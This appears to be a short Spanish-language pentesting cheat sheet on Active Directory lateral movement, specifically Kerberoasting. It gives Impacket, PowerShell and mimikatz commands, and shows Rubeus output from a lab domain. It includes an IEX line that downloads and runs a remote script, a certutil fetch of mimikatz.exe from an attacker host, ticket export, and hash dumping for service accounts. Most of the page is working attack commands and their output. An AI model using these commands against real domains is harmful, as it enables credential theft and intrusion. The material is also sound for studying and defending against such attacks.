AD Lateral Movement
Obteniendo ticket Kerberos por medio de Rubeus
## Metodo Impacket
impacket-GetUserSPNs controller.local/Machine1:Password1 -dc-ip 10.10.10.111 -request
## Metodo Mimikatz
powershell IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.111/GetUserSPNs.ps1')
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/xor-app23.xor.com:1433"
certutil.exe -f -urlcache -split http://10.10.10.111/mimikatz.exe
.\mimikatz.exe 'kerberos::list /export' exit
C:\xampp\htdocs\books\myFiles\backups>Rubeus.exe kerberoast /outfile:hash.txt
Rubeus.exe kerberoast /outfile:hash.txt
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.0.1
[*] Action: Kerberoasting
[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.
[*] Target Domain : xor.com
[*] Searching path 'LDAP://xor-dc01.xor.com/DC=xor,DC=com' for '(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'
[*] Total kerberoastable users : 3
[*] SamAccountName : ExchangeService
[*] DistinguishedName : CN=ExchangeService,OU=ServiceAccounts,OU=xorUsr,DC=xor,DC=com
[*] ServicePrincipalName : HTTP/ExchangeService.xor.com
[*] PwdLastSet : 5/20/2019 1:07:08 PM
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash written to C:\xampp\htdocs\books\myFiles\backups\hash.txt
AS-REP
SHARPHOUND
Última actualización